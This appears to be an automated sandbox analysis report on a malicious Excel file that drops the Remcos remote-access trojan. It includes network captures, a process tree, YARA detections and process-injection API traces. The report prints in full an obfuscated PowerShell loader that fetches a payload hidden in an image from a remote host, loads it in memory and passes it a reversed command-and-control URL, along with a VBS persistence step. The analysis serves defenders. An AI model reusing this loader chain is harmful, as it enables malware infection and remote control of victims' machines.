            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: paste.ee
            Connection: Keep-Alive
            2024-05-27 07:00:41 UTC | 1236 | IN | HTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:41 GMT
            Content-Type: text/plain; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Cache-Control: max-age=2592000
            strict-transport-security: max-age=63072000
            x-frame-options: DENY
            x-content-type-options: nosniff
            x-xss-protection: 1; mode=block
            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dqROFPZcJG5K%2BtL1fQjFKKimcx7SafD0t35oPh9SpNNHwlohP4bYOEEA9T3WOKsmlSwumSjiVjsTg%2F%2FWa7du%2BufaMd5Zp3bT1RCJyCPr9T5jP9bEQTEMFmIQg%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88a421207b81420d-EWR
            alt-svc: h3=":443"; ma=86400


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.22 | 49173 | 188.114.97.3 | 443 | 3608 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-05-27 07:00:46 UTC | 124 | OUT | GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
            Host: uploaddeimagens.com.br
            Connection: Keep-Alive
            2024-05-27 07:00:46 UTC | 696 | IN | HTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:46 GMT
            Content-Type: image/jpeg
            Content-Length: 4201093
            Connection: close
            Last-Modified: Tue, 21 May 2024 16:07:14 GMT
            ETag: "664cc6b2-401a85"
            Cache-Control: max-age=2678400
            CF-Cache-Status: REVALIDATED
            Accept-Ranges: bytes
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HHwMex%2FD3QlFPQH0KQ3tWydXS0vB49aus6ynstl28TWfp8bLDY7nbuusP9Yhe%2B2HPMznw1jOO6803%2BdSh1UNRbzWGrrjgORfiTdwdbP36O%2Bt%2B2aI8bYK6zG2KnkAfUUeowF5VaHKYYr1"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88a4213c8b4e1780-EWR
            alt-svc: h3=":443"; ma=86400


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            2 | 192.168.2.22 | 49174 | 188.114.97.3 | 443 | 3608 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-05-27 07:00:50 UTC | 100 | OUT | GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
            Host: uploaddeimagens.com.br
            2024-05-27 07:00:50 UTC | 692 | IN | HTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:50 GMT
            Content-Type: image/jpeg
            Content-Length: 4201093
            Connection: close
            Last-Modified: Tue, 21 May 2024 16:07:14 GMT
            ETag: "664cc6b2-401a85"
            Cache-Control: max-age=2678400
            CF-Cache-Status: HIT
            Age: 4
            Accept-Ranges: bytes
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdfy37gpQzT%2ByWx7E48JQRgnIYUjavJ5IKXTpNDAe0hp0ZgsYdW93EA33SX%2FzcsDuxg8V9OA08LC36FTpPsmVk2u71ij1ziai3PcGbwZ1evDBXtKOZdtL%2FmTawJTbW6Z94D5enlbkchu"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88a421587d190f87-EWR
            alt-svc: h3=":443"; ma=86400


            Target ID:0
            Start time:03:00:02
            Start date:27/05/2024
            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Imagebase:0x13fa50000
            File size:28'253'536 bytes
            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:4
            Start time:03:00:26
            Start date:27/05/2024
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Imagebase:0x13f500000
            File size:1'423'704 bytes
            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:7
            Start time:03:00:37
            Start date:27/05/2024
            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Wow64 process (32bit):true
            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Imagebase:0x400000
            File size:543'304 bytes
            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:03:00:39
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs"
            Imagebase:0x280000
            File size:141'824 bytes
            MD5 hash:979D74799EA6C8B8167869A68DF5204A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:10
            Start time:03:00:42
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
            Imagebase:0x1300000
            File size:427'008 bytes
            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:12
            Start time:03:00:43
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Imagebase:0x1300000
            File size:427'008 bytes
            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            Reputation:moderate
            Has exited:true

            Target ID:13
            Start time:03:00:56
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs
            Imagebase:0x1300000
            File size:427'008 bytes
            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:15
            Start time:03:00:57
            Start date:27/05/2024
            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Imagebase:0x1160000
            File size:64'704 bytes
            MD5 hash:8FE9545E9F72E460723F484C304314AD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:16
            Start time:03:00:58
            Start date:27/05/2024
            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Imagebase:0x1160000
            File size:64'704 bytes
            MD5 hash:8FE9545E9F72E460723F484C304314AD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:17
            Start time:03:00:58
            Start date:27/05/2024
            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Imagebase:0x1160000
            File size:64'704 bytes
            MD5 hash:8FE9545E9F72E460723F484C304314AD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            Reputation:moderate
            Has exited:false

            Target ID:19
            Start time:03:01:08
            Start date:27/05/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs"
            Imagebase:0xff640000
            File size:168'960 bytes
            MD5 hash:045451FA238A75305CC26AC982472367
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:20
            Start time:03:01:16
            Start date:27/05/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs"
            Imagebase:0xfffc0000
            File size:168'960 bytes
            MD5 hash:045451FA238A75305CC26AC982472367
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true


            Module: Sheet1

            Declaration
            Attribute VB_Name = "Sheet1"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True

            Module: Sheet2

            Declaration
            Attribute VB_Name = "Sheet2"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True

            Module: Sheet3

            Declaration
            Attribute VB_Name = "Sheet3"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True

            Module: ThisWorkbook

            Declaration
            Attribute VB_Name = "ThisWorkbook"
            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True

              Memory Dump Source
              • Source File: 0000000A.00000002.545886808.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_1ad000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fa9d34ac28f12b7542005d69655c0ea47c7f0c6eca5d059877a755ccc096203a
              • Instruction ID: 615d0341a7808fed3fdec0a0790ad3fe8264fc587984e8b637a798735787a06d
              • Opcode Fuzzy Hash: fa9d34ac28f12b7542005d69655c0ea47c7f0c6eca5d059877a755ccc096203a
              • Instruction Fuzzy Hash: DE018C6100D3C09FD7124B259D94752BFB4EF53624F1984CBE8858F2A3C2685C45CB72
              Memory Dump Source
              • Source File: 0000000A.00000002.545886808.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_1ad000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3a71b0e0fc63982a0e146dbf61c3ac55622c39d092c6b976f8f654292ac8660a
              • Instruction ID: 8ce535ca207abd58cd4e787d88a0a07b2820c57af7fad27d77aa733734d80baf
              • Opcode Fuzzy Hash: 3a71b0e0fc63982a0e146dbf61c3ac55622c39d092c6b976f8f654292ac8660a
              • Instruction Fuzzy Hash: 0E01F774104740EEE7144E25DD84B67BBD8DF52764F28C419FC4A0F682C3799941CAB1

              Execution Graph

              Execution Coverage:9.1%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:33.3%
              Total number of Nodes:24
              Total number of Limit Nodes:2

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: ($PC
              • API String ID: 0-1001392370
              • Opcode ID: f4dc662b2717a36257d972d43ff539781bc390afa53dd250446d7b0eaf2d3458
              • Instruction ID: 7f894aabc682bcab157a69630818219aa158386e20a423c75a8f7df70cd6ba1a
              • Opcode Fuzzy Hash: f4dc662b2717a36257d972d43ff539781bc390afa53dd250446d7b0eaf2d3458
              • Instruction Fuzzy Hash: E362B074A11228CFDB68DF65C894BDDBBB2BF89305F1081EAD419A7291DB346E85CF40

              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2d48a33baa30746be7c1cc95ef187e51423e53d6c2a665d462c786eb345bd872
              • Instruction ID: 6bbbdbae31fcbdae1c30f0a051ac33a6f9a4137005ea793f879bb366689a8174
              • Opcode Fuzzy Hash: 2d48a33baa30746be7c1cc95ef187e51423e53d6c2a665d462c786eb345bd872
              • Instruction Fuzzy Hash: 67713C71D0A3988FDB16DF25D8616C9BFB1AF8A300F0580EBD488AB262DB345D85CF55

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $&#$$&#$L4#p$L4#p$L4#p$d.#$d.#
              • API String ID: 0-2051439108
              • Opcode ID: ec9fb2ed233f31cb497bd75b36eb72ef7bbe32bc35bd442b948bee8eada22854
              • Instruction ID: b79c79f5f0e85091d7bcab17b2f4afcc657ef535f49af3bba8898f95ab848cc3
              • Opcode Fuzzy Hash: ec9fb2ed233f31cb497bd75b36eb72ef7bbe32bc35bd442b948bee8eada22854
              • Instruction Fuzzy Hash: 9BB10335B00344EFDB2BAF64C8407BF7BA2AF84310F1584AAE9158B2A1DB71DD45CB91

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: D<1$D<1$D<1$D<1$h<1$h<1
              • API String ID: 0-1580266833
              • Opcode ID: 4a8f65e3e94bec2b95a1fa7f60aa68291490a99737600c4ec61e6a5a56f28f64
              • Instruction ID: 821debd1f8d6b77aed5f96858708e45d1094fe05ccbf9aee0be19c3e41e3e8d4
              • Opcode Fuzzy Hash: 4a8f65e3e94bec2b95a1fa7f60aa68291490a99737600c4ec61e6a5a56f28f64
              • Instruction Fuzzy Hash: DE9154B4700304DBDF2A6A74885077A77EA9FC5301F2584BAD906DB791EE76CC82C7A1

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: D<1$D<1$D<1$D<1
              • API String ID: 0-2731855761
              • Opcode ID: ede11a1d59324e4885508d02e130f0111725bc261732f5711abff7db62620fc1
              • Instruction ID: 47ea8c9ed3af0251941a5bc264222e67d07a5fa34a5262f6220607665ae613e6
              • Opcode Fuzzy Hash: ede11a1d59324e4885508d02e130f0111725bc261732f5711abff7db62620fc1
              • Instruction Fuzzy Hash: C4416AB8304345DFDF2F7B21880027A77A95F45700F1680E6DA01EB692EB76CD86D761

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: @=1$@=1$@=1
              • API String ID: 0-1625691303
              • Opcode ID: 51c1cd21b83c280881711f52332315319fb38fe5c9a71f7ecf542e5a072bb548
              • Instruction ID: 6e706fb1b2067a51852d51b862c3e24968ff766e123c650d9bcd3a8b56b1d972
              • Opcode Fuzzy Hash: 51c1cd21b83c280881711f52332315319fb38fe5c9a71f7ecf542e5a072bb548
              • Instruction Fuzzy Hash: E9E1F435B04300DFDB26AB64C45077ABBEAAFC5310F2984EAE4499B391DB75CD42C7A1

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: D<1$D<1
              • API String ID: 0-3091184708
              • Opcode ID: c3f8a857e3fb3af01bcc4b87c5c3cc6d7f9e8cf5b25cff26f388f0e15ea6ba85
              • Instruction ID: fb7ca02de8d2da1cfd342dfe3e6dcb2bea3240ba50e1f2370efb8f5d88950f18
              • Opcode Fuzzy Hash: c3f8a857e3fb3af01bcc4b87c5c3cc6d7f9e8cf5b25cff26f388f0e15ea6ba85
              • Instruction Fuzzy Hash: 9F014978700300DBDF2ABB61880067DB359AB9C740B2180A6E915BB241DA378D43D759

              APIs
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00258E87
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: f975bc8dfa680192aa61e69df00a3749c7c6746ce529e2983915715f8129b42d
              • Instruction ID: a641d0d1004d3fcb2e35f18561ed25d4a4783df328c283b9d3d57ea5b16e7648
              • Opcode Fuzzy Hash: f975bc8dfa680192aa61e69df00a3749c7c6746ce529e2983915715f8129b42d
              • Instruction Fuzzy Hash: 06C13570D10219CFDB24CFA4C841BEDBBB1BF49301F1491A9E919B7280DBB49A99CF95

              APIs
              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 002588FB
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: 976825728ff30e6bc04c40831f59db6f3e57e3ba8d52941fcc86e25592df88bb
              • Instruction ID: c7c5852faac483d383c22c6f63fa0c4f0c91f5a65148ff6f9e66e79039ba0aba
              • Opcode Fuzzy Hash: 976825728ff30e6bc04c40831f59db6f3e57e3ba8d52941fcc86e25592df88bb
              • Instruction Fuzzy Hash: B241ABB4D00249DFCF00CFA9D984AEEBBF1BB49314F24942AE818B7250D775AA55CF64

              APIs
              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025867F
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: 589b5db16b0c9e5e2c633e2043207c70ddaed4ef890cf6de1b6b9529109804bb
              • Instruction ID: c85301274bf9b4f6e5ae5760cbc853e021f3d8c20c432b9ee93f9a1952fa8267
              • Opcode Fuzzy Hash: 589b5db16b0c9e5e2c633e2043207c70ddaed4ef890cf6de1b6b9529109804bb
              • Instruction Fuzzy Hash: B741B0B5D102599FDB10CFA9D984AEEBBB5BB48314F24802AE414B7240D778AA49CF54

              APIs
              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025867F
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: ef78ef4b5d8ac9b5cc40ee76515d805d81f9b1b63cb3f6745fd763e8edff92be
              • Instruction ID: 1e7fc26371dc16bfe65da72b9db5a92c124744453b7fff0055912712c7011ed7
              • Opcode Fuzzy Hash: ef78ef4b5d8ac9b5cc40ee76515d805d81f9b1b63cb3f6745fd763e8edff92be
              • Instruction Fuzzy Hash: 6141CFB4D10259DFDB10CFA9D984AEEBBF5BF48314F24802AE814B7240D778A949CF54

              Control-flow Graph

              control_flow_graph 690 2584e0-258574 ResumeThread 693 258576-25857c 690->693 694 25857d-2585bf 690->694 693->694
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.465921187.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_250000_powershell.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: e5aa8ab67ef247ef51151cd92e25295d996383e11fd28c001a15ae07416e3f6e
              • Instruction ID: c13eba071ccd5e3936bd5aeb252445d41a82aa63510e95ca3bb0db25794dc2c4
              • Opcode Fuzzy Hash: e5aa8ab67ef247ef51151cd92e25295d996383e11fd28c001a15ae07416e3f6e
              • Instruction Fuzzy Hash: E931B9B4D102199FCB10CFA9D984AEEFBB4AB89314F24942AE814B7210D775A905CF98
              Memory Dump Source
              • Source File: 0000000C.00000002.465848908.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_1dd000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 44845337617e2ff5d90f406eec7dc88047b6f2e873877bbc96df61de4a56c2c0
              • Instruction ID: 20328febbfb711e68c8a362ca532cd5aea0a50f7466b8066b1cb3a0f109760b0
              • Opcode Fuzzy Hash: 44845337617e2ff5d90f406eec7dc88047b6f2e873877bbc96df61de4a56c2c0
              • Instruction Fuzzy Hash: 56018F71508340EAE7248A25EC84B66BB98DFC17A4F28C55BED490B282C3799945CAB1
              Memory Dump Source
              • Source File: 0000000C.00000002.465848908.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_1dd000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 52b48ee043968f522a4bb1e8c333e43e1d16485e4a5a1ce56be7a117f3a4945e
              • Instruction ID: 6d0acac90d6b1fc77f536d694bbaedc1fa19f895ff17cecc51f39f19346c9db9
              • Opcode Fuzzy Hash: 52b48ee043968f522a4bb1e8c333e43e1d16485e4a5a1ce56be7a117f3a4945e
              • Instruction Fuzzy Hash: ED015E6140D3C09FD7128B259C94B52BFA4DF92624F19C1DBE9888F2A3C2699848C772
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 219a3ff682b055aa9b6916d18537342e7f98d2483621ba9ecaa4b409eab09842
              • Instruction ID: e7e5b8fa8074c1af825ebb2ce69080e10f18a656b314b7fde3182488664c9828
              • Opcode Fuzzy Hash: 219a3ff682b055aa9b6916d18537342e7f98d2483621ba9ecaa4b409eab09842
              • Instruction Fuzzy Hash: 43E0D831704344CFEF2B766194213AF77916FA2250F1140D6E89097657CA348905C322
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (:1$(:1$(:1$0'%$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:1$L:1$L:1
              • API String ID: 0-230141455
              • Opcode ID: 9f6cb60c940f89ab4d044e57ab4317cd53dddbe409f1d5b17e24473e56e1f9c7
              • Instruction ID: 05ed5b2ee6354937af0830c5e5d19f8f159bf3869a18463e95704496b222d492
